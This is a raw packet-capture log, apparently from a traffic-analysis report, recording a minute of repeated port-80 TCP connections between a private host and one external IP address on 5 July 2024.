                                                                Jul 5, 2024 04:23:29.254952908 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:29.259717941 CEST804976277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:29.259779930 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:29.260070086 CEST804976177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:29.260117054 CEST4976180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:29.260287046 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:29.264974117 CEST804976277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:29.972260952 CEST804976277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:29.972421885 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:29.972999096 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:29.977754116 CEST804976277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:30.194071054 CEST804976277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:30.194139957 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:30.301371098 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:30.301692009 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:30.306368113 CEST804976277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:30.306418896 CEST804976477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:30.306436062 CEST4976280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:30.306499004 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:30.306853056 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:30.311602116 CEST804976477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:31.006547928 CEST804976477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:31.006598949 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:31.007241011 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:31.012031078 CEST804976477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:31.228542089 CEST804976477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:31.228677034 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:31.334338903 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:31.334610939 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:31.340558052 CEST804976677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:31.340569019 CEST804976477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:31.340632915 CEST4976480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:31.340645075 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:31.340780973 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:31.348063946 CEST804976677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:32.057574987 CEST804976677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:32.059315920 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:32.059794903 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:32.065069914 CEST804976677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:32.287636042 CEST804976677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:32.295079947 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:32.410610914 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:32.410876989 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:32.416234016 CEST804976677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:32.416280031 CEST804976777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:32.416311026 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:32.416476011 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:32.416476011 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:32.421344042 CEST804976777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:33.126724958 CEST804976777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:33.126785040 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:33.127479076 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:33.132236004 CEST804976777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:33.347933054 CEST804976777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:33.349994898 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:33.457462072 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:33.457737923 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:33.623894930 CEST804976877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:33.623959064 CEST804976777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:33.624053001 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:33.624053001 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:33.624241114 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:33.629101038 CEST804976877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:34.352545977 CEST804976877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:34.353337049 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:34.359522104 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:34.365003109 CEST804976877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:34.585289955 CEST804976877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:34.589590073 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:34.691992044 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:34.692267895 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:34.697020054 CEST804976877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:34.697032928 CEST804976977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:34.697067976 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:34.697113037 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:34.697236061 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:34.701929092 CEST804976977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:35.386133909 CEST804976977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:35.386205912 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:35.386725903 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:35.391464949 CEST804976977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:35.603096008 CEST804976977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:35.603157043 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:35.707487106 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:35.707772970 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:35.712508917 CEST804976977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:35.712552071 CEST804977077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:35.712584019 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:35.712639093 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:35.712718964 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:35.717494965 CEST804977077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:36.420730114 CEST804977077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:36.420783997 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:36.421453953 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:36.426248074 CEST804977077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:36.646673918 CEST804977077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:36.646725893 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:36.754457951 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:36.754766941 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:36.759969950 CEST804977077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:36.759991884 CEST804977177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:36.760051012 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:36.760107994 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:36.760266066 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:36.764972925 CEST804977177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:37.490860939 CEST804977177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:37.490948915 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:37.491487026 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:37.496264935 CEST804977177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:37.717454910 CEST804977177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:37.717623949 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:37.832590103 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:37.832900047 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:37.837709904 CEST804977277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:37.837779045 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:37.837862015 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:37.837871075 CEST804977177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:37.837920904 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:37.842900038 CEST804977277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:38.529313087 CEST804977277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:38.529386997 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:38.530031919 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:38.534750938 CEST804977277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:38.745621920 CEST804977277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:38.745668888 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:38.848221064 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:38.848521948 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:38.854022026 CEST804977377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:38.854101896 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:38.854192972 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:38.854255915 CEST804977277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:38.854309082 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:38.859544992 CEST804977377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:39.590507030 CEST804977377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:39.590574980 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:39.591196060 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:39.596213102 CEST804977377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:39.817998886 CEST804977377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:39.818073988 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:39.928395033 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:39.928641081 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:39.933471918 CEST804977477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:39.933484077 CEST804977377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:39.933549881 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:39.933562994 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:39.933651924 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:39.938329935 CEST804977477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:40.625317097 CEST804977477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:40.625380039 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:40.625988960 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:40.630744934 CEST804977477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:40.842959881 CEST804977477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:40.843040943 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:40.957525015 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:40.957808018 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:40.962850094 CEST804977577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:40.962938070 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:40.963092089 CEST804977477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:40.963102102 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:40.963141918 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:40.967838049 CEST804977577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:41.663203955 CEST804977577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:41.663271904 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:41.663881063 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:41.668620110 CEST804977577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:41.884958982 CEST804977577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:41.885129929 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:41.988827944 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:41.989149094 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:41.993907928 CEST804977577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:41.993982077 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:41.994028091 CEST804977677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:41.994088888 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:41.994187117 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:41.998954058 CEST804977677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:42.722449064 CEST804977677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:42.722527027 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:42.723181963 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:42.728579044 CEST804977677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:42.952613115 CEST804977677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:42.952666998 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:43.067009926 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:43.067306042 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:43.072304964 CEST804977677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:43.072318077 CEST804977777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:43.072351933 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:43.072407961 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:43.072515011 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:43.077194929 CEST804977777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:43.771044970 CEST804977777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:43.771105051 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:43.771687984 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:43.776442051 CEST804977777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:43.989423990 CEST804977777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:43.989492893 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:44.098159075 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:44.098423958 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:44.103174925 CEST804977877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:44.103255033 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:44.103323936 CEST804977777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:44.103370905 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:44.103471994 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:44.108424902 CEST804977877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:44.812478065 CEST804977877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:44.812546968 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:44.813102961 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:44.819055080 CEST804977877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:45.038695097 CEST804977877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:45.038763046 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:45.145217896 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:45.145519018 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:45.150803089 CEST804977977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:45.150815010 CEST804977877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:45.150865078 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:45.150880098 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:45.151015997 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:45.155796051 CEST804977977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:45.862473011 CEST804977977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:45.862556934 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:45.863101959 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:45.867907047 CEST804977977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:46.085939884 CEST804977977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:46.086004972 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:46.191901922 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:46.192229033 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:46.196990013 CEST804978077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:46.197077990 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:46.197168112 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:46.197191954 CEST804977977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:46.197244883 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:46.201885939 CEST804978077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:46.923702955 CEST804978077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:46.923791885 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:46.925061941 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:46.929827929 CEST804978077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:47.153659105 CEST804978077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:47.153772116 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:47.273943901 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:47.274235964 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:47.279012918 CEST804978177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:47.279023886 CEST804978077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:47.279088974 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:47.279103994 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:47.279233932 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:47.283947945 CEST804978177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:47.973948956 CEST804978177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:47.974023104 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:47.974554062 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:47.979304075 CEST804978177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:48.191167116 CEST804978177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:48.191426992 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:48.301407099 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:48.301692963 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:48.309030056 CEST804978277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:48.309111118 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:48.309202909 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:48.309566021 CEST804978177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:48.309609890 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:48.314246893 CEST804978277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:49.001403093 CEST804978277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:49.001502037 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:49.002120972 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:49.006920099 CEST804978277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:49.218465090 CEST804978277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:49.218630075 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:49.332674980 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:49.332957983 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:49.337753057 CEST804978377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:49.337764025 CEST804978277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:49.337816954 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:49.337840080 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:49.338002920 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:49.342753887 CEST804978377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:50.051719904 CEST804978377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:50.051785946 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:50.052386045 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:50.057104111 CEST804978377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:50.275393009 CEST804978377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:50.275453091 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:50.379661083 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:50.380151987 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:50.384737968 CEST804978377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:50.384783030 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:50.384912968 CEST804978577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:50.384975910 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:50.385157108 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:50.389858007 CEST804978577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:51.114955902 CEST804978577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:51.115031958 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:51.115644932 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:51.120433092 CEST804978577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:51.344749928 CEST804978577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:51.344830036 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:51.457530975 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:51.457894087 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:51.462635040 CEST804978577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:51.462678909 CEST804978677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:51.462735891 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:51.462779999 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:51.462860107 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:51.467649937 CEST804978677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:52.172797918 CEST804978677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:52.172852993 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:52.173520088 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:52.178250074 CEST804978677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:52.396946907 CEST804978677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:52.397020102 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:52.504437923 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:52.504722118 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:52.509522915 CEST804978777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:52.509603024 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:52.509715080 CEST804978677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:52.509749889 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:52.509778023 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:52.514470100 CEST804978777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:53.201112986 CEST804978777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:53.201196909 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:53.203459024 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:53.208184958 CEST804978777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:53.419475079 CEST804978777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:53.419554949 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:53.535618067 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:53.535883904 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:53.540663958 CEST804978877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:53.540676117 CEST804978777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:53.540754080 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:53.540770054 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:53.540865898 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:53.545553923 CEST804978877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:54.252053976 CEST804978877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:54.255341053 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:54.255899906 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:54.262973070 CEST804978877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:54.475650072 CEST804978877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:54.475703001 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:54.582665920 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:54.582869053 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:54.799024105 CEST804978977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:54.799036980 CEST804978877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:54.799110889 CEST4978880192.168.2.477.91.77.82
